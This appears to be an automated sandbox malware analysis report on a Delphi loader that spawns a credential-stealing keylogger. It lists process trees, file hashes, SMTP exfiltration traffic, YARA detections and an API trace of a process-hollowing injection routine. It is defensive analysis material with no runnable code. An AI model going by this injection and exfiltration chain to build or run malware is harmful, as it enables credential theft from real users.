Jan 2, 2025 16:05:59.582561970 CET	587	49799	208.91.198.176	192.168.2.4	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 2, 2025 16:05:59.582701921 CET	49799	587	192.168.2.4	208.91.198.176	STARTTLS
Jan 2, 2025 16:05:59.880295038 CET	587	49799	208.91.198.176	192.168.2.4	220 Ready to start TLS

Target ID:	0
Start time:	10:04:56
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\image.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\image.exe"
Imagebase:	0x400000
File size:	2'143'232 bytes
MD5 hash:	4F481037138109F314141B4FEDE21F87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1714114145.0000000002406000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1679035138.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:04:59
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:04:59
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:05:00
Start date:	02/01/2025
Path:	C:\Users\Public\Libraries\nhpoymuP.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\nhpoymuP.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:05:11
Start date:	02/01/2025
Path:	C:\Users\Public\Libraries\Pumyophn.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Pumyophn.PIF"
Imagebase:	0x400000
File size:	2'143'232 bytes
MD5 hash:	4F481037138109F314141B4FEDE21F87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 16%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:05:11
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7652, Parent PID: 7644

General

Target ID:	6
Start time:	10:05:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:05:11
Start date:	02/01/2025
Path:	C:\Users\Public\Libraries\nhpoymuP.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\nhpoymuP.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2945818229.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:05:19
Start date:	02/01/2025
Path:	C:\Users\Public\Libraries\Pumyophn.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Pumyophn.PIF"
Imagebase:	0x400000
File size:	2'143'232 bytes
MD5 hash:	4F481037138109F314141B4FEDE21F87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:05:19
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7996, Parent PID: 7976

General

Target ID:	13
Start time:	10:05:20
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:05:19
Start date:	02/01/2025
Path:	C:\Users\Public\Libraries\nhpoymuP.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\nhpoymuP.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.2964961500.0000000026094000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000001.1913774017.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.2945858419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.4%
Total number of Nodes:	289
Total number of Limit Nodes:	16

Executed Functions

Function 02CA8BA8 Relevance: 47.2, APIs: 3, Strings: 23, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA881C: LoadLibraryA.KERNEL32(00000000,00000000,02CA8903), ref: 02CA8850
Part of subcall function 02CA881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CA8903), ref: 02CA8860
Part of subcall function 02CA881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02CA8879
Part of subcall function 02CA881C: FreeLibrary.KERNEL32(74AE0000,00000000,02CF1388,Function_000065D8,00000004,02CF1398,02CF1388,000186A3,00000040,02CF139C,74AE0000,00000000,00000000,00000000,00000000,02CA8903), ref: 02CA88E3

Part of subcall function 02CA85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8660

GetThreadContext.KERNEL32(00000864,02CF1420,ScanString,02CF13A4,02CAA774,UacInitialize,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,UacInitialize,02CF13A4), ref: 02CA943A

Part of subcall function 02CA824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA82BD

Part of subcall function 02CA84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CA8521

Part of subcall function 02CA79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A1F

Part of subcall function 02CA7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7D6C

SetThreadContext.KERNEL32(00000864,02CF1420,ScanBuffer,02CF13A4,02CAA774,ScanString,02CF13A4,02CAA774,Initialize,02CF13A4,02CAA774,000005C8,00276FF8,02CF14F8,00000004,02CF14FC), ref: 02CAA14F
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000864,00000000,00000864,02CF1420,ScanBuffer,02CF13A4,02CAA774,ScanString,02CF13A4,02CAA774,Initialize,02CF13A4,02CAA774,000005C8,00276FF8,02CF14F8), ref: 02CAA15C

Part of subcall function 02CA8798: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize,02CF13A4,02CAA774,UacScan), ref: 02CA87AC
Part of subcall function 02CA8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA87C6
Part of subcall function 02CA8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize), ref: 02CA8802

Strings

UacScan, xrefs: 02CA8CAB, 02CA8EC3, 02CA94BF, 02CA98BB, 02CA9A2F, 02CAA1D9, 02CAA671
ScanBuffer, xrefs: 02CA8D04, 02CA8D8C, 02CA9127, 02CA923C, 02CA92D9, 02CA9612, 02CA9799, 02CA992C, 02CA9B11, 02CA9C26, 02CA9DE4, 02CA9F54, 02CAA0C7, 02CAA2BB, 02CAA4D9, 02CAA61F
H!(!, xrefs: 02CA8C8E, 02CA8C94, 02CA8D5C, 02CA9CD8
sppc, xrefs: 02CA91AE
MiniDumpWriteDump, xrefs: 02CAA54C
dbgcore, xrefs: 02CAA551, 02CAA565
NtSetSecurityObject, xrefs: 02CAA6C7
BCryptVerifySignature, xrefs: 02CAA3AB
I_QueryTagInformation, xrefs: 02CAA538
Initialize, xrefs: 02CA8F22, 02CA9530, 02CA96B7, 02CA9AA0, 02CA9D02, 02CA9E72, 02CA9FE5, 02CAA24A, 02CAA57B
NtOpenProcess, xrefs: 02CAA6DB
BCryptRegisterProvider, xrefs: 02CAA3D3
NtOpenObjectAuditAlarm, xrefs: 02CAA46C, 02CAA524
SLGetLicenseInformation, xrefs: 02CA9197
ScanString, xrefs: 02CA8C3A, 02CA8DE5, 02CA8F93, 02CA93BB, 02CA95A1, 02CA9728, 02CA9BB5, 02CA9D73, 02CA9EE3, 02CAA056, 02CAA341, 02CAA3EE
NtReadVirtualMemory, xrefs: 02CAA458
BCryptQueryProviderRegistration, xrefs: 02CAA3BF
advapi32, xrefs: 02CAA53D
UacInitialize, xrefs: 02CA8E6A, 02CA91CB, 02CA934A, 02CA944E, 02CA984A, 02CA99BE, 02CAA168
MiniDumpReadDumpStream, xrefs: 02CAA560
ntdll, xrefs: 02CAA45D, 02CAA471, 02CAA529, 02CAA6CC, 02CAA6E0
OpenSession, xrefs: 02CA8BE1, 02CA9004, 02CA90B6, 02CAA487, 02CAA5CD
bcrypt, xrefs: 02CAA3B0, 02CAA3C4, 02CAA3D8

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
